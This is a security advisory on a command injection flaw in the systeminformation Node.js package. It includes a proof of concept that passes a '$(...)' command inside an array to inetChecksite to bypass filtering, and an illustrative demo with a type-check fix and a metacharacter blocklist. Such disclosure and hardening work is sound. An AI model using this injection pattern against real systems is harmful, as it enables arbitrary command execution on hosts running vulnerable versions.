Command Injection in sebhildebrandt/systeminformation
Feb 12th 2021
systeminformation is vulnerable to Command Injection.
It is possible to send an array containing OS commands, which bypass the filters.
Proof of Concept
const si = require('systeminformation');
const command = "$(<OS Command>)";
// The value is passed inside an array rather than as a plain string
si.inetChecksite([command]);
Edit the constant command with a desired OS command.
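Why an array can pass a filter written for strings, and the type check that closes the gap, shown as an added example that is not systeminformation's code. The blocked-character set, the function names and the sample inputs are all hypothetical and constructed for illustration; nothing here executes a command.

```javascript
// Hypothetical character blocklist (assumption, not the library's own list).
const BLOCKED = new Set(['$', '(', ')', '`', ';', '|', '&', '<', '>', '\n']);

// Filter written with strings in mind: walks the input by index and
// drops blocked characters. It never checks what type it was given.
function naiveSanitize(input) {
  const s = input || '';
  let out = '';
  for (let i = 0; i < s.length; i++) {
    // For a string, s[i] is one character. For an array, s[i] is a whole
    // element, which never equals a single blocked character, so the
    // element is appended unfiltered (and coerced to a string by +=).
    if (!BLOCKED.has(s[i])) out += s[i];
  }
  return out;
}

// Hardened variant: refuse anything that is not a primitive string
// before any character-level filtering takes place.
function strictSanitize(input) {
  if (typeof input !== 'string') {
    const kind = Array.isArray(input) ? 'array' : typeof input;
    throw new TypeError('expected a string, got ' + kind);
  }
  return naiveSanitize(input);
}

// Run both filters on one input and report what each lets through.
function compare(input) {
  let strict;
  try {
    strict = strictSanitize(input);
  } catch (err) {
    strict = 'rejected: ' + err.message;
  }
  return { naive: naiveSanitize(input), strict };
}

// Constructed sample inputs: the same text as a string and inside an array.
const asString = compare('$(example)');
const asArray = compare(['$(example)']);
console.log(asString); // metacharacters stripped by both filters
console.log(asArray);  // naive filter passes it intact, strict rejects
```

The same check belongs at every public entry point that forwards a parameter to a shell, since any array-like value with a `length` property gets past the index-based loop in the same way.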